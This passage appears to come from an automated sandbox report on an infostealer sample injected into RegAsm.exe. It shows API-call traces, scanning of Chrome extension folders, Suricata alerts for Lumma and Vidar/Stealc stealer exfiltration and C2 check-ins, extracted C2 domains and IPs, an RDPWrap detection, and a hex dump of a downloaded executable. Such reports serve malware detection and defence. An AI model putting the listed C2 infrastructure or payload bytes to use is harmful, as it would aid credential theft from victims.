Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	2_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	2_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	2_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

2_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	2_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	2_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then xor eax, eax	8_2_0040F042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_0040D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	8_2_0040F807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h	8_2_00447AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00447AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	8_2_00447D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh	8_2_00447E1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, esi	8_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	8_2_0044B010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00425030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]	8_2_0040C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	8_2_0044B1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_00427230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	8_2_004452E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	8_2_004142E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	8_2_0044B320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]	8_2_00407450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	8_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	8_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	8_2_00442410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_0044B430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	8_2_004314A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	8_2_004404AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_0044A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_00435519
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00433623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	8_2_00449620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00434629
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	8_2_0040F63A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	8_2_00414692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000668h]	8_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h	8_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	8_2_0040F7E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000001C8h]	8_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000198h]	8_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	8_2_004408E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	8_2_00444970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000884h]	8_2_00429978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	8_2_00420A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	8_2_00440A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	8_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	8_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	8_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	8_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00421AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	8_2_00444BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	8_2_0041AB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	8_2_00448B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	8_2_00430CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	8_2_00405CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	8_2_00404CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	8_2_00449D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	8_2_00445DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	8_2_00448D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	8_2_0042FE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	8_2_0042FE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ebx, 02h	8_2_00413EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	8_2_00413EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then dec ebx	8_2_0043FE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	8_2_00426FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp dword ptr [004521ECh]	8_2_0041FFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+eax+01h], 00000000h	8_2_0042DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	8_2_0043BFF0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056176 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop) : 192.168.2.4:52568 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.4:51877 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056177 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI) : 192.168.2.4:49766 -> 104.21.36.139:443
Source: Network traffic	Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.4:49767 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.4:62977 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.4:49768 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.4:56240 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.4:49770 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.4:63460 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.4:49771 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.4:49981 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.4:49773 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.4:49776 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.4:51859 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.4:64698 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.4:49777 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.4:65108 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.4:49779 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49778 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49742 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.4:49744
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.4:49743
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49766 -> 104.21.36.139:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49766 -> 104.21.36.139:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49770 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49770 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49773 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49773 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49777 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49777 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49776 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49779 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49779 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49767 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49767 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49776 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49768 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49768 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49771 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49771 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49781 -> 172.67.128.144:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49781 -> 172.67.128.144:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.4:49790
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.4:49791

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: ghostreedmnu.shop
Source: Malware configuration extractor	URLs: wallkedsleeoi.shop
Source: Malware configuration extractor	URLs: stogeneratmns.shop
Source: Malware configuration extractor	URLs: fragnantbui.shop
Source: Malware configuration extractor	URLs: reinforcenh.shop
Source: Malware configuration extractor	URLs: gutterydhowi.shop
Source: Malware configuration extractor	URLs: drawzhotdog.shop
Source: Malware configuration extractor	URLs: offensivedzvju.shop
Source: Malware configuration extractor	URLs: vozmeatillu.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869

Yara detected RDPWrap Tool

Source: Yara match	File source: 19.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.2436777725.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RDPWInst.exe PID: 3168, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.4:49784 -> 8.46.123.33:3389

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:15:06 GMTContent-Type: application/octet-streamContent-Length: 385064Last-Modified: Thu, 26 Sep 2024 22:09:48 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5dbac-5e028"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 db f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 cd 05 00 53 00 00 00 00 e0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 ba 05 00 28 26 00 00 00 00 06 00 0c 00 00 00 b0 cc 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 ae 05 00 00 20 00 00 00 b0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 e0 05 00 00 06 00 00 00 b2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 06 00 00 02 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ce 05 00 00 00 00 00 48 00 00 00 02 00 05 00 80 bc 05 00 30 10 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 79 1c 59 59 6c 14 76 5e 87 dc f4 35 66 85 48 24 b2 ce 02 9f f7 2f fa 57 cb 61 b6 7a 7a f0 df 35 4f 10 9b 37 1c cd 12 66 9e 17 53 d5 6c 5c f1 52 42 af 6b 08 35 e6 ea 8e 7f 45 71 7f 85 08 89 95 76 f5 df 0e a5 d6 fc 42 00 1a 12 66 8a 8c a2 0d cc d6 dd fd 9a b7 bc c6 39 76 02 fa f3 3b 28 cc 46 d9 81 20 0a 4a 2a b2 67 cc 69 96 ae 28 1e d1 d6 18 42 b3 42 cb 4d 9a 73 8f a0 c3 3c 0d c8 75 62 e5 20 1b 6c f5 5d b3 87 96 ab bd 51 67 83 b4 d5 5c c3 42 63 2a 84 b1 06 91 e4 24 95 19 a0 1f c7 f8 aa f8 66 56 47 5a 94 db 00 2e f4 cb 98 c5 a0 c0 c1 38 d1 da 99 e2 a3 9c 0e 6c 48 3b 21 f8 0a 17 22 ae e3 f0 fb 82 f0 70 98 55 4f 04 38 d7 59 22 c7 e2 fb f1 64 f2 d1 be 5c eb 0e a2 64 44 22 b3 73 6d 7d cb 63 23 15 3f e1 34 3f 13 f1 59 23 dc 04 b7 a4 e3 17 cb 30 bb 1b 1d ff 56 53 cd bd 1d 58 bb 10 7c 89 e7 0c c4 9d 47 16 2e cb 67 ac 3a 21 72 4d 5b 7e 1b 01 94 65 bf 42 70 d5 e0 62 7a a7 7b 84 1c 